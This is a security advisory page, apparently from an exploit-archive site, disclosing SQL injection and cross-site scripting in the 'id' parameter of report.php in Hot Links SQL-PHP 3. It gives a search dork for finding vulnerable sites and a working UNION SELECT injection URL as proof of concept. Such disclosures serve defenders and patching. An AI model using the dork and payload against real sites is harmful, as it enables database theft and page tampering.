Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities

2008.10.02
Credit: sl4xUz
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

########################################################### # # ___ __ __ __ __ # /\_ \ /\ \\ \ /\ \/\ \ # ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ # /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ # /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ # \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ # \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ # # security breakd0wn! ########################################################### # # Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities # Vendor: http://www.mrcgiguy.com # Vulnerable Version: 3 and prior versions # Fix: N/A # ########################################################### # # c0ntact: sl4x.xuz[at]gmail[dot]com # d0rk: "Powered By: Hot Links SQL-PHP 3" # stop lammo # ########################################################### ###################### 1. Information ###################### Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free. ###################### 2. Vulnerabilities ###################### SQL Injection in "report.php" in the "id" parameter. Cross Site Scripting in "report.php" in the "id" parameter. ###################### 3. PoC ###################### http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3-- http://localhost/path/report.php?id=[XSS] ###########################################################

Referencje:

http://www.securityfocus.com/bid/31078
http://www.milw0rm.com/exploits/6403


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top